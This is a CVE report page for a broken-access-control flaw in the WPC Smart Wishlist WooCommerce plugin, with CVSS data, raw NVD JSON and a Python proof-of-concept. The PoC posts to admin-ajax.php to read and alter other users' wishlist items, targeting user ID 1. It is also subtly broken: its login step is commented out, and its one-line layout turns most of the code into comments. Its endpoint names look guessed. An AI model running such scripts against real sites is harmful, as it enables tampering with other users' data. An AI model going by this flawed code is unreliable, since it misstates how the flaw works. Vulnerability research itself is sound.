Security Vulnerability Report
中文
CVE-2026-32407 CVSS 4.3 MEDIUM

CVE-2026-32407

Published: 2026-03-13 19:54:57
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in WPClever WPC Smart Wishlist for WooCommerce woo-smart-wishlist allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WPC Smart Wishlist for WooCommerce: from n/a through <= 5.0.8.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WPC Smart Wishlist for WooCommerce <= 5.0.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import re # CVE-2026-32407 PoC - Missing Authorization in WPC Smart Wishlist # Target: WooCommerce WPC Smart Wishlist plugin <= 5.0.8 target_url = "http://target-site.com" # Step 1: Authenticate as low-privilege user (subscriber role) session = requests.Session() # Login as subscriber user login_data = { "log": "subscriber_user", "pwd": "password", "wp-submit": "Log In" } # session.post(f"{target_url}/wp-login.php", data=login_data) # Step 2: Exploit missing authorization to access other users' wishlists # The plugin's AJAX endpoints lack proper capability checks # Get wishlist items for arbitrary user (exploiting the vulnerability) exploit_endpoint = f"{target_url}/wp-admin/admin-ajax.php" exploit_data = { "action": "woo_wishlist_get_items", "user_id": "1", # Target user ID (often admin) "wishlist_id": "1" } response = session.post(exploit_endpoint, data=exploit_data) print(f"Response Status: {response.status_code}") print(f"Response Content: {response.text}") # Step 3: Modify or delete other users' wishlist items modify_data = { "action": "woo_wishlist_update_item", "item_id": "123", # Target item ID "user_id": "1", "product_id": "456", "quantity": "99" } response = session.post(exploit_endpoint, data=modify_data) print(f"Modify Response: {response.text}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32407", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:57.210", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WPClever WPC Smart Wishlist for WooCommerce woo-smart-wishlist allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WPC Smart Wishlist for WooCommerce: from n/a through <= 5.0.8."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en WPClever WPC Smart Wishlist para WooCommerce woo-smart-wishlist permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a WPC Smart Wishlist para WooCommerce: desde n/a hasta &lt;= 5.0.8."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woo-smart-wishlist/vulnerability/wordpress-wpc-smart-wishlist-for-woocommerce-plugin-5-0-8-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}